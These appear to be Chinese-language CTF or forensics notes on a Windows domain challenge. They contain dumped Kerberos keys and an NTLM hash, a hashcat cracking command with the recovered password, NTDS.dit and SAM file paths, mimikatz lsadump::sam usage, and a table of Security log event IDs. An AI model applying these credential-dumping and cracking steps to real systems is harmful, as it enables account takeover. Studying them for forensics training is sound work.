Noah:aes256-cts-hmac-sha1-96:a6f754e6b93cad1b3472a627ab007a710819569e9d3b44d0688dab92d2f93efd
Noah:aes128-cts-hmac-sha1-96:e9d4cebb4b663b32b17caed3c3c64edc
Noah:des-cbc-md5:ea0b2a4cea70e6e9
Donald:aes256-cts-hmac-sha1-96:f25cb2dc1269780ce6c366ee4a78a40f443ff9521e49ea709bee4b0b1e7fc5b3
Donald:aes128-cts-hmac-sha1-96:433c504d6b77d6c297605d272b02ae3d
Donald:des-cbc-md5:8cb5589152316eda
Alexander:aes256-cts-hmac-sha1-96:0aafdbdcc39a3b5d3d79e51aeff82e75dcf9cd0beba1b5c79abdfbac757e597c
Alexander:aes128-cts-hmac-sha1-96:3e7e13a98af4e2e8c1bd5c3abc00d729
Alexander:des-cbc-md5:a79832e3b658491c
Austin:aes256-cts-hmac-sha1-96:2942adb6d614d9c805f86de96ed7d83bb10d39772b83425a6b9cec610f9ad7e3
Austin:aes128-cts-hmac-sha1-96:210743007b2ee4578e9faef2c91905a0
Austin:des-cbc-md5:c81f8c464c0e97ae
Michelle:aes256-cts-hmac-sha1-96:077152b6daaa372437c6fdd3b28d95e4bfaaf3fa68c665dce5a0f101482d0cfd
Michelle:aes128-cts-hmac-sha1-96:21251e328b8cb3b84184d5485765aa86
Michelle:des-cbc-md5:f25d6eb3f8439e31
Adam:aes256-cts-hmac-sha1-96:3894f2ac25768a95e1f537224aa1949c72c0fe4a5f3cf06fdb43a91d34b9724e
Adam:aes128-cts-hmac-sha1-96:62b6a054a409457f540c44ea0ace2c3b
Adam:des-cbc-md5:cea72ab98a1562f2
Isaiah:aes256-cts-hmac-sha1-96:5eded632130c72fa261669cd660e353f9dcb1579a27b866a21345a8bc0d56b81
Isaiah:aes128-cts-hmac-sha1-96:616855dfb064127290371b24824fb929
Isaiah:des-cbc-md5:a7c28097c2f76d38
Anthony:aes256-cts-hmac-sha1-96:511d25e2720b6432d4b1d07583038c47667a106050a7375a3ef30d6f72df8e85
Anthony:aes128-cts-hmac-sha1-96:bb1fe1afb0cc57c421efef129a689a76
Anthony:des-cbc-md5:c4fbfd234f2a897a
mary:aes256-cts-hmac-sha1-96:7dde43d29a88d5ba112ef65504f0fbb816e338cfd0dbd0a00ca5bf4f71e68c71
mary:aes128-cts-hmac-sha1-96:f3354f18e63831179775895da3e2132b
mary:des-cbc-md5:e64ab92f83673123
James:aes256-cts-hmac-sha1-96:fc0072f9ff62c0c9e573f15f58a65af617003e4466ebfcfd8cb707b4e0a0e00b
James:aes128-cts-hmac-sha1-96:24cb2366b831cdd0dee62173fcd0123d
James:des-cbc-md5:79d6c837ef9b6d4a
[*] Cleaning up...

James:3193:aad3b435b51404eeaad3b435b51404ee:9fc8c6b0ac495fa52039ab6e0276a3c3:::

• 用户名：James
• 用户 ID：3193（通常是用户的 RID，即相对标识符）
• LM 哈希：aad3b435b51404eeaad3b435b51404ee
• NTLM 哈希：9fc8c6b0ac495fa52039ab6e0276a3c3
• 其他字段：:::（通常用于存储其他信息，如用户组等）

hashcat爆破 .\hashcat.exe -m 1000 9fc8c6b0ac495fa52039ab6e0276a3c3 .\rockyou.txt

maintainer-james-3011liverpool!

---

• ntds.dit文件是域环境中域控上会有的一个文件，这个文件存储着域内所有用户的凭据信息(hash)。

• 非域环境也就是在工作组环境中，有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。

  ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit
  system文件位置:C:\Windows\System32\config\SYSTEM
  sam文件位置:C:\Windows\System32\config\SAM
  https://blog.csdn.net/qq_41874930/article/details/108141331

非域环境

导出Windows\System32\config目录下的SAM、SYSTEM、SECURITY文件

lsadump::sam /sam:SAM /system:SYSTEM

因为该题是在域中，而不是工作组，所以导致SAM解包信息不全

---

evtx文件分析

• System.evtx

  记录操作系统自身组件产生的日志事件，比如驱动、系统组件和应用软件的崩溃以及数据丢失错误等等。

• Application.evtx

  记录应用程序或系统程序运行方面的日志事件，比如数据库程序可以在应用程序日志中记录文件错误，应用的崩溃记录等。

• Security.evtx

  记录系统的安全审计日志事件，比如登录事件、对象访问、进程追踪、特权调用、帐号管理、策略变更等。Security.evtx也是取证中最常用到的。

  事件ID	描述
  4608	Windows 启动
  4609	Windows 关机
  4616	系统时间发生更改
  4624	用户成功登录到计算机
  4625	登录失败。使用未知用户名或密码错误的已知用户名尝试登录。
  4634	用户注销完成
  4647	用户启动了注销过程
  4648	用户在以其他用户身份登录时，使用显式凭据成功登录到计算机
  4703	令牌权限调整
  4704	分配了用户权限
  4720	已创建用户账户
  4725	账户被禁用
  4768	请求Kerberos身份验证票证（TGT）
  4769	请求Kerberos服务票证
  4770	已续订Kerberos服务票证
  4779	用户在未注销的情况下断开了终端服务器会话

非域环境破解用户名和密码

1、使用mimikatz工具

• 导出Windows\System32\config目录下的SAM、SYSTEM、SECURITY文件

• 命令lsadump::sam /sam:SAM /system:SYSTEM读取文件NTLM hash值，然后去破解hash值可以得到密码

2、使用FTP破解